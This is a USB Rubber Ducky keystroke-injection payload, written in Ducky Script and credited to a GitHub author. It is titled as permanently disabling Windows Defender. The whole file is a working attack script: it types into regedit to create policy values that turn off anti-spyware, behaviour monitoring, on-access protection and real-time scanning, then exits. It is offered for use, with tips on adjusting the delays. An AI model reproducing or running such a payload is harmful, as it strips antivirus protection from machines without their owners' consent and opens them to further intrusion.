REM Title: Disable Windows Defender Permanently
REM Description: Disables windows defender permanently through Registry Editor, computer has to restart for changes to take effect
REM Author: https://github.com/HokkaidoInu
REM delay: You may want to change the delays and/or delete some, I have it like it is because I have really slow computer
DELAY 4000
GUI r
DELAY 4000
STRING regedit
DELAY 4000
ENTER
DELAY 4000
LEFT
DELAY 4000
ENTER
DELAY 4000
TAB
DELAY 4000
TAB
DELAY 4000
STRING HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
DELAY 4000
ENTER
DELAY 4000
APP
DELAY 4000
STRING n
DELAY 4000
STRING d
DELAY 4000
STRING DisableAntiSpyware
DELAY 4000
ENTER
DELAY 4000
APP
DELAY 4000
STRING m
DELAY 4000
STRING 1
DELAY 4000
ENTER
DELAY 4000
TAB
DELAY 4000
TAB
DELAY 4000
APP
DELAY 4000
STRING n
DELAY 4000
STRING k
DELAY 4000
STRING Real-Time Protection
DELAY 4000
ENTER
DELAY 4000
APP
DELAY 4000
STRING n
DELAY 4000
STRING d
DELAY 4000
STRING DisableBehaviorMonitoring
DELAY 4000
ENTER
DELAY 4000
APP
DELAY 4000
STRING m
DELAY 4000
STRING 1
DELAY 4000
ENTER
DELAY 4000
TAB
DELAY 4000
TAB
DELAY 4000
APP
DELAY 4000
STRING n
DELAY 4000
STRING d
DELAY 4000
STRING DisableOnAccessProtection
DELAY 4000
ENTER
DELAY 4000
APP
DELAY 4000
STRING m
DELAY 4000
STRING 1
DELAY 4000
ENTER
DELAY 4000
TAB
DELAY 4000
TAB
DELAY 4000
APP
DELAY 4000
STRING n
DELAY 4000
STRING d
DELAY 4000
STRING DisableScanOnRealtimeEnable
DELAY 4000
ENTER
DELAY 4000
APP
DELAY 4000
STRING m
DELAY 4000
STRING 1
DELAY 4000
ENTER
DELAY 4000
ALT F X
